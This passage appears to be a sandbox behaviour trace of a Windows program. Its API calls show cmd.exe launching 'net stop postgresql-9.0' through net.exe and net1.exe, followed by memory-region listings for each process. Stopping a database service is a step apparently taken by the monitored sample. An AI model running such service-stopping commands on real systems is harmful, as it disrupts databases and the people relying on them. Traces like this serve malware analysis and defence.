_wcsicmp (_String1="net", _String2="PATH") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0128.979] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0128.979] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0128.979] _wcsicmp (_String1="net", _String2="VER") returned -8 [0128.979] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0128.979] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0128.979] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0128.979] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0128.979] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0128.979] _wcsicmp (_String1="net", _String2="START") returned -5 [0128.979] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0128.979] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0128.979] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0128.979] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0128.979] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0128.979] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0128.979] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0128.979] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0128.979] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0128.979] _wcsicmp (_String1="net", _String2="IF") returned 5 [0128.979] _wcsicmp (_String1="net", _String2="REM") returned -4 [0128.980] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0128.980] SetErrorMode (uMode=0x0) returned 0x0 [0128.980] SetErrorMode (uMode=0x1) returned 0x0 [0128.980] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52a05d0, lpFilePart=0x4fcf2cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4fcf2cc*="Desktop") returned 0x1d [0128.980] SetErrorMode (uMode=0x0) returned 0x1 [0128.980] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.980] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.987] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.987] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.987] GetConsoleTitleW (in: lpConsoleTitle=0x4fcf54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.988] InitializeProcThreadAttributeList (in: lpAttributeList=0x4fcf478, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4fcf45c | out: lpAttributeList=0x4fcf478, lpSize=0x4fcf45c) returned 1 [0128.988] UpdateProcThreadAttribute (in: lpAttributeList=0x4fcf478, dwFlags=0x0, Attribute=0x60001, lpValue=0x4fcf464, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4fcf478, lpPreviousValue=0x0) returned 1 [0128.988] GetStartupInfoW (in: lpStartupInfo=0x4fcf4b0 | out: lpStartupInfo=0x4fcf4b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.988] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.989] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop postgresql-9.0", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4fcf400*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop postgresql-9.0", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4fcf44c | out: lpCommandLine="net stop postgresql-9.0", lpProcessInformation=0x4fcf44c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xedc, dwThreadId=0xed4)) returned 1 [0128.997] CloseHandle (hObject=0xa4) returned 1 [0128.997] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.997] GetEnvironmentStringsW () returned 0x52a9ed0* [0128.997] FreeEnvironmentStringsA (penv="=") returned 1 [0128.997] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0129.113] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4fcf3e4 | out: lpExitCode=0x4fcf3e4*=0x2) returned 1 [0129.113] CloseHandle (hObject=0xa8) returned 1 [0129.113] _vsnwprintf (in: _Buffer=0x4fcf4cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x4fcf3ec | out: _Buffer="00000002") returned 8 [0129.113] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0129.113] GetEnvironmentStringsW () returned 0x52ab3c0* [0129.114] FreeEnvironmentStringsA (penv="=") returned 1 [0129.114] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.114] GetEnvironmentStringsW () returned 0x52ab3c0* [0129.114] FreeEnvironmentStringsA (penv="=") returned 1 [0129.114] DeleteProcThreadAttributeList (in: lpAttributeList=0x4fcf478 | out: lpAttributeList=0x4fcf478) [0129.114] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.114] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.114] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.114] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.114] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.114] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.115] SetConsoleInputExeNameW () returned 0x1 [0129.115] GetConsoleOutputCP () returned 0x1b5 [0129.115] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.115] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.115] exit (_Code=2) Thread: id = 420 os_tid = 0xee0 Process: id = "113" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x26038000" os_pid = "0xb20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "112" os_parent_pid = "0xe74" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6567 start_va = 0x7f0f9000 end_va = 0x7f0f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f9000" filename = "" Region: id = 6568 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6569 start_va = 0xc04290000 end_va = 0xc042affff entry_point = 0x0 region_type = private name = "private_0x0000000c04290000" filename = "" Region: id = 6570 start_va = 0xc042b0000 end_va = 0xc042c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c042b0000" filename = "" Region: id = 6571 start_va = 0xc042d0000 end_va = 0xc0430ffff entry_point = 0x0 region_type = private name = "private_0x0000000c042d0000" filename = "" Region: id = 6572 start_va = 0x7df5ff690000 end_va = 0x7ff5ff68ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff690000" filename = "" Region: id = 6573 start_va = 0x7ff6c3e50000 end_va = 0x7ff6c3e72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e50000" filename = "" Region: id = 6574 start_va = 0x7ff6c3e7c000 end_va = 0x7ff6c3e7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e7c000" filename = "" Region: id = 6575 start_va = 0x7ff6c3e7e000 end_va = 0x7ff6c3e7efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e7e000" filename = "" Region: id = 6576 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6577 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6578 start_va = 0xc04290000 end_va = 0xc0429ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c04290000" filename = "" Region: id = 6579 start_va = 0xc042a0000 end_va = 0xc042a6fff entry_point = 0x0 region_type = private name = "private_0x0000000c042a0000" filename = "" Region: id = 6580 start_va = 0xc04310000 end_va = 0xc0434ffff entry_point = 0x0 region_type = private name = "private_0x0000000c04310000" filename = "" Region: id = 6581 start_va = 0xc04350000 end_va = 0xc0444ffff entry_point = 0x0 region_type = private name = "private_0x0000000c04350000" filename = "" Region: id = 6582 start_va = 0xc04450000 end_va = 0xc0450dfff entry_point = 0xc04450000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6583 start_va = 0xc04510000 end_va = 0xc04510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c04510000" filename = "" Region: id = 6584 start_va = 0xc04520000 end_va = 0xc04526fff entry_point = 0x0 region_type = private name = "private_0x0000000c04520000" filename = "" Region: id = 6585 start_va = 0xc04530000 end_va = 0xc0453ffff entry_point = 0x0 region_type = private name = "private_0x0000000c04530000" filename = "" Region: id = 6586 start_va = 0xc04540000 end_va = 0xc046c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c04540000" filename = "" Region: id = 6587 start_va = 0xc046d0000 end_va = 0xc04850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c046d0000" filename = "" Region: id = 6588 start_va = 0xc04860000 end_va = 0xc05c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c04860000" filename = "" Region: id = 6589 start_va = 0xc05c60000 end_va = 0xc05c60fff entry_point = 0x0 region_type = private name = "private_0x0000000c05c60000" filename = "" Region: id = 6590 start_va = 0xc05c70000 end_va = 0xc05c70fff entry_point = 0x0 region_type = private name = "private_0x0000000c05c70000" filename = "" Region: id = 6591 start_va = 0x7ff6c3d50000 end_va = 0x7ff6c3e4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d50000" filename = "" Region: id = 6592 start_va = 0x7ff6c3e7a000 end_va = 0x7ff6c3e7bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e7a000" filename = "" Region: id = 6593 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6594 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6595 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6596 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6597 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6598 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6599 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6600 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6601 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6602 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6603 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6604 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6605 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6606 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 417 os_tid = 0xee8 Thread: id = 418 os_tid = 0xee4 Thread: id = 419 os_tid = 0xed8 Process: id = "114" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x264f3000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "112" os_parent_pid = "0xe74" cmd_line = "net stop postgresql-9.0" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6620 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 6621 start_va = 0xf20000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 6622 start_va = 0x4f20000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 6623 start_va = 0x4f40000 end_va = 0x4f41fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 6624 start_va = 0x4f50000 end_va = 0x4f63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 6625 start_va = 0x4f70000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 6626 start_va = 0x4fb0000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 6627 start_va = 0x5030000 end_va = 0x5033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005030000" filename = "" Region: id = 6628 start_va = 0x5040000 end_va = 0x5040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005040000" filename = "" Region: id = 6629 start_va = 0x5050000 end_va = 0x5051fff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 6630 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6631 start_va = 0x7fb40000 end_va = 0x7fb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fb40000" filename = "" Region: id = 6632 start_va = 0x7fb64000 end_va = 0x7fb64fff entry_point = 0x0 region_type = private name = "private_0x000000007fb64000" filename = "" Region: id = 6633 start_va = 0x7fb6c000 end_va = 0x7fb6efff entry_point = 0x0 region_type = private name = "private_0x000000007fb6c000" filename = "" Region: id = 6634 start_va = 0x7fb6f000 end_va = 0x7fb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb6f000" filename = "" Region: id = 6635 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6636 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6637 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6638 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6639 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6640 start_va = 0x5250000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 6641 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6642 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6643 start_va = 0x53c0000 end_va = 0x54bffff entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 6644 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 421 os_tid = 0xed4 Thread: id = 422 os_tid = 0xec4 Process: id = "115" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x26620000" os_pid = "0xeb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "114" os_parent_pid = "0xedc" cmd_line = "C:\\Windows\\system32\\net1 stop postgresql-9.0" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6645 start_va = 0x200000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6646 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 6647 start_va = 0x230000 end_va = 0x243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 6648 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 6649 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6650 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 6651 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 6652 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6653 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 6654 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 6655 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6656 start_va = 0x7ef50000 end_va = 0x7ef72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef50000" filename = "" Region: id = 6657 start_va = 0x7ef79000 end_va = 0x7ef79fff entry_point = 0x0 region_type = private name = "private_0x000000007ef79000" filename = "" Region: id = 6658 start_va = 0x7ef7a000 end_va = 0x7ef7afff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 6659 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 6660 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6661 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6662 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6663 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6664 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6665 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6666 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6667 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 